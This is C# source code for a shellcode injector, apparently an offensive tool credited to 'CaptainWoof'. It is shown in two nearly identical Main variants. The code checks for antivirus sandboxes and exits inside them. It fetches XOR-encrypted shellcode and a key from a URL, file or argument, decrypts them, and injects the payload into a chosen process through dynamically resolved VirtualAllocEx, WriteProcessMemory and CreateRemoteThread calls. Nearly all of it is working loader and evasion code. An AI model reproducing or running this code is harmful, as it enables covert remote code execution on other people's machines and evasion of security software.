// Main
public static void Main()
{
// Inputs for usage
Boolean RunAVEvasion = true; // Set to false to skip it
int TargetPid = -1; // Set to target pid, set as -1 to use target process's name instead
String TargetProcessName = ""; // Set to target process's name
string KeySource = ""; // http(s) url OR plaintext OR file location of xor-decrypt key
string ShellcodeSource = ""; // http(s) url OR file location, leave blank to use shellcode from array
byte[] ShellcodeEncrypted = {}; // Xor-encrypted shellcode array to use
/////////////////////////////////////////////
// DON't MODIFY BELOW THINGS FOR EVERYDAY USE
/////////////////////////////////////////////
if (RunAVEvasion)
{
Console.WriteLine("Checking if running in an AV sandbox...");
if (Heuristics.IsRunningInAVSandbox())
{
return;
}
}
// Check if target process(es) is running
ArrayList TargetProcesses = new ArrayList();
if (TargetPid != -1)
{
try
{
Process P = Process.GetProcessById(TargetPid);
TargetProcesses.Add(P);
}
catch (ArgumentException)
{
Console.WriteLine(string.Format("No process with PID {0} exists !"), TargetPid);
return;
}
}
else
{
foreach (Process P in Process.GetProcessesByName(TargetProcessName))
{
TargetProcesses.Add(P);
}
if (TargetProcesses.Count == 0)
{
Console.WriteLine(string.Format("No process with name '{0}' exists !", TargetProcessName));
return;
}
}
// Arrange for the needed Win32 API funcs (D/Invoke)
IntPtr OpenProcessAddr = IntPtr.Zero, VirtualAllocExAddr = IntPtr.Zero, CreateRemoteThreadAddr = IntPtr.Zero, WriteProcessMemoryAddr = IntPtr.Zero, CloseHandleAddr = IntPtr.Zero, VirtualFreeExAddr = IntPtr.Zero;
if (!GetFunctionAddreses(ref OpenProcessAddr, ref VirtualAllocExAddr, ref CreateRemoteThreadAddr, ref WriteProcessMemoryAddr, ref CloseHandleAddr, ref VirtualFreeExAddr))
{
Console.WriteLine("Failed to get needed function addresess");
return;
}
OpenProcessDelegate OpenProcess = (OpenProcessDelegate)Marshal.GetDelegateForFunctionPointer(OpenProcessAddr, typeof(OpenProcessDelegate));
VirtualAllocExDelegate VirtualAllocEx = (VirtualAllocExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocExAddr, typeof(VirtualAllocExDelegate));
CreateRemoteThreadDelegate CreateRemoteThread = (CreateRemoteThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateRemoteThreadAddr, typeof(CreateRemoteThreadDelegate));
WriteProcessMemoryDelegate WriteProcessMemory = (WriteProcessMemoryDelegate)Marshal.GetDelegateForFunctionPointer(WriteProcessMemoryAddr, typeof(WriteProcessMemoryDelegate));
CloseHandleDelegate CloseHandle = (CloseHandleDelegate)Marshal.GetDelegateForFunctionPointer(CloseHandleAddr, typeof(CloseHandleDelegate));
VirtualFreeExDelegate VirtualFreeEx = (VirtualFreeExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualFreeExAddr, typeof(VirtualFreeExDelegate));
// Show target processes
Console.Write("Chosen process(es): ");
foreach (Process P in TargetProcesses)
{
Console.Write(string.Format("{0}({1}) ", P.ProcessName, P.Id));
}
Console.WriteLine("");
// Get the encrypted shellcode
if (ShellcodeEncrypted.Length == 0)
{
try
{
if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://")))
{
Console.Write("Downloading xor-encrypted shellcode: ");
WebClient WC = new WebClient();
ShellcodeEncrypted = WC.DownloadData(ShellcodeSource);
Console.Write("DONE !");
}
else if (File.Exists(ShellcodeSource))
{
Console.Write("Reading xor-encrypted shellcode from file: ");
ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource);
Console.Write("DONE !");
}
else
{
throw new Exception();
}
Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
}
// Get the decryption key
byte[] DecryptionKey;
try
{
if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://")))
{
Console.Write("Fetching decryption key: ");
WebClient WC = new WebClient();
DecryptionKey = WC.DownloadData(KeySource);
Console.Write("DONE !");
}
else if (File.Exists(KeySource))
{
Console.Write("Reading decryption key from file: ");
DecryptionKey = File.ReadAllBytes(KeySource);
Console.Write("DONE !");
}
else
{
Console.Write("Reading decryption key from plaintext input: ");
DecryptionKey = Encoding.UTF8.GetBytes(KeySource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Decrypt shellcode
Console.Write("Decrypting shellcode: ");
IntPtr BytesWritten = IntPtr.Zero;
byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length];
for (int i = 0; i < ShellcodeDecrypted.Length; i++)
{
ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]);
}
Console.WriteLine("DONE");
// Inject shellcode
try
{
Console.WriteLine("Injecting shellcode in target process(es)...");
foreach (Process P in TargetProcesses)
{
Console.Write(string.Format("\t> Trying '{0}'({1}): ", P.ProcessName, P.Id));
IntPtr TargetProcessH = OpenProcess(ProcessAccessFlags.CreateThread | ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VirtualMemoryOperation | ProcessAccessFlags.VirtualMemoryRead | ProcessAccessFlags.VirtualMemoryWrite, true, P.Id);
if (TargetProcessH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} opening handle to target process", GetLastError()));
continue;
}
IntPtr AllocatedMemoryP = VirtualAllocEx(TargetProcessH, IntPtr.Zero, (uint)ShellcodeEncrypted.Length,
AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (AllocatedMemoryP == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} allocating memory in target process", GetLastError()));
CloseHandle(TargetProcessH);
continue;
}
// Inject shellcode to target process
if (!WriteProcessMemory(TargetProcessH, AllocatedMemoryP, ShellcodeDecrypted, ShellcodeDecrypted.Length, out BytesWritten))
{
Console.WriteLine(string.Format("Error {0} writing shellcode to process memory", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit);
CloseHandle(TargetProcessH);
continue;
}
if ((int)BytesWritten != ShellcodeDecrypted.Length)
{
Console.WriteLine(string.Format("Error {0} writing full shellcode to process memory", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit);
CloseHandle(TargetProcessH);
continue;
}
Console.WriteLine("DONE");
// Start execution of the shellcode
Console.Write("Spawning new thread in target process: ");
IntPtr NewThreadId = IntPtr.Zero;
IntPtr NewThreadH = CreateRemoteThread(TargetProcessH, IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, out NewThreadId);
if (NewThreadH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0}", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release);
CloseHandle(TargetProcessH);
continue;
}
CloseHandle(NewThreadH);
CloseHandle(TargetProcessH);
Console.WriteLine("SUCCESS !\n\nWritten by CaptainWoof");
break;
}
}
catch (Exception exception)
{
Console.WriteLine(string.Format("\n\n{0}", exception.Message));
}
}
// Main
public static void Main(string[] args)
{
// XorEncryptedShellcodeInjector <Shellcode_source> <key_to_decrypt> <pid|processname>
// Help section
string WholeArg = "";
for (int i = 0; i < args.Length; i++)
{
WholeArg += args.GetValue(i);
}
if (WholeArg.Contains("--help-detailed"))
{
PrintDetailedHelp();
return;
}
else if ((args.Length < 3) || WholeArg.ToLower().Contains("--help") || WholeArg.ToLower().Contains("-h"))
{
PrintUsage();
return;
}
// Check if running in AV Sandbox
if (!WholeArg.Contains("--skip-av-sandbox-check"))
{
Console.WriteLine("Checking if running in an AV sandbox...");
if (Heuristics.IsRunningInAVSandbox())
{
return;
}
}
// Check if target process(es) is running
ArrayList TargetProcesses = new ArrayList();
if (IsNumeric(args[2]))
{
try
{
Process P = Process.GetProcessById(Int32.Parse(args[2]));
TargetProcesses.Add(P);
}
catch (ArgumentException)
{
Console.WriteLine(string.Format("No process with PID {0} exists !"), Int32.Parse(args[2]));
return;
}
}
else
{
foreach (Process P in Process.GetProcessesByName(args[2]))
{
TargetProcesses.Add(P);
}
if (TargetProcesses.Count == 0)
{
Console.WriteLine(string.Format("No process with name '{0}' exists !", args[2]));
return;
}
}
// Arrange for the needed Win32 API funcs (D/Invoke)
IntPtr OpenProcessAddr = IntPtr.Zero, VirtualAllocExAddr = IntPtr.Zero, CreateRemoteThreadAddr = IntPtr.Zero, WriteProcessMemoryAddr = IntPtr.Zero, CloseHandleAddr = IntPtr.Zero, VirtualFreeExAddr = IntPtr.Zero;
if (!GetFunctionAddreses(ref OpenProcessAddr, ref VirtualAllocExAddr, ref CreateRemoteThreadAddr, ref WriteProcessMemoryAddr, ref CloseHandleAddr, ref VirtualFreeExAddr))
{
Console.WriteLine("Failed to get needed function addresess");
return;
}
OpenProcessDelegate OpenProcess = (OpenProcessDelegate)Marshal.GetDelegateForFunctionPointer(OpenProcessAddr, typeof(OpenProcessDelegate));
VirtualAllocExDelegate VirtualAllocEx = (VirtualAllocExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocExAddr, typeof(VirtualAllocExDelegate));
CreateRemoteThreadDelegate CreateRemoteThread = (CreateRemoteThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateRemoteThreadAddr, typeof(CreateRemoteThreadDelegate));
WriteProcessMemoryDelegate WriteProcessMemory = (WriteProcessMemoryDelegate)Marshal.GetDelegateForFunctionPointer(WriteProcessMemoryAddr, typeof(WriteProcessMemoryDelegate));
CloseHandleDelegate CloseHandle = (CloseHandleDelegate)Marshal.GetDelegateForFunctionPointer(CloseHandleAddr, typeof(CloseHandleDelegate));
VirtualFreeExDelegate VirtualFreeEx = (VirtualFreeExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualFreeExAddr, typeof(VirtualFreeExDelegate));
// Parse args
string KeySource = args[1];
string ShellcodeSource = args[0];
// Show target processes
Console.Write("Chosen process(es): ");
foreach (Process P in TargetProcesses)
{
Console.Write(string.Format("{0}({1}) ", P.ProcessName, P.Id));
}
Console.WriteLine("");
// Get the encrypted shellcode
byte[] ShellcodeEncrypted;
try
{
if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://")))
{
Console.Write("Downloading xor-encrypted shellcode: ");
WebClient WC = new WebClient();
ShellcodeEncrypted = WC.DownloadData(ShellcodeSource);
Console.Write("DONE !");
}
else if (File.Exists(ShellcodeSource))
{
Console.Write("Reading xor-encrypted shellcode from file: ");
ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource);
Console.Write("DONE !");
}
else
{
Console.WriteLine("Converting xor-encrypted shellcode from base64 argument: ");
ShellcodeEncrypted = Convert.FromBase64String(ShellcodeSource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Get the decryption key
byte[] DecryptionKey;
try
{
if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://")))
{
Console.Write("Fetching decryption key: ");
WebClient WC = new WebClient();
DecryptionKey = WC.DownloadData(KeySource);
Console.Write("DONE !");
}
else if (File.Exists(KeySource))
{
Console.Write("Reading decryption key from file: ");
DecryptionKey = File.ReadAllBytes(KeySource);
Console.Write("DONE !");
}
else
{
Console.Write("Reading decryption key from argument: ");
DecryptionKey = Encoding.UTF8.GetBytes(KeySource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Decrypt shellcode
Console.Write("Decrypting shellcode: ");
IntPtr BytesWritten = IntPtr.Zero;
byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length];
for (int i = 0; i < ShellcodeDecrypted.Length; i++)
{
ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]);
}
Console.WriteLine("DONE");
// Inject shellcode
try
{
Console.WriteLine("Injecting shellcode in target process(es)...");
foreach (Process P in TargetProcesses)
{
Console.Write(string.Format("\t> Trying '{0}'({1}): ", P.ProcessName, P.Id));
IntPtr TargetProcessH = OpenProcess(ProcessAccessFlags.CreateThread | ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VirtualMemoryOperation | ProcessAccessFlags.VirtualMemoryRead | ProcessAccessFlags.VirtualMemoryWrite, true, P.Id);
if (TargetProcessH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} opening handle to target process", GetLastError()));
continue;
}
IntPtr AllocatedMemoryP = VirtualAllocEx(TargetProcessH, IntPtr.Zero, (uint)ShellcodeEncrypted.Length,
AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (AllocatedMemoryP == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} allocating memory in target process", GetLastError()));
CloseHandle(TargetProcessH);
continue;
}
// Inject shellcode to target process
if (!WriteProcessMemory(TargetProcessH, AllocatedMemoryP, ShellcodeDecrypted, ShellcodeDecrypted.Length, out BytesWritten))
{
Console.WriteLine(string.Format("Error {0} writing shellcode to process memory", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit);
CloseHandle(TargetProcessH);
continue;
}
if ((int)BytesWritten != ShellcodeDecrypted.Length)
{
Console.WriteLine(string.Format("Error {0} writing full shellcode to process memory", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit);
CloseHandle(TargetProcessH);
continue;
}
Console.WriteLine("DONE");
// Start execution of the shellcode
Console.Write("Spawning new thread in target process: ");
IntPtr NewThreadId = IntPtr.Zero;
IntPtr NewThreadH = CreateRemoteThread(TargetProcessH, IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, out NewThreadId);
if (NewThreadH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0}", GetLastError()));
VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release);
CloseHandle(TargetProcessH);
continue;
}
CloseHandle(NewThreadH);
CloseHandle(TargetProcessH);
Console.WriteLine("SUCCESS !\n\nWritten by CaptainWoof");
break;
}
}
catch (Exception exception)
{
Console.WriteLine(string.Format("\n\n{0}", exception.Message));
}
}
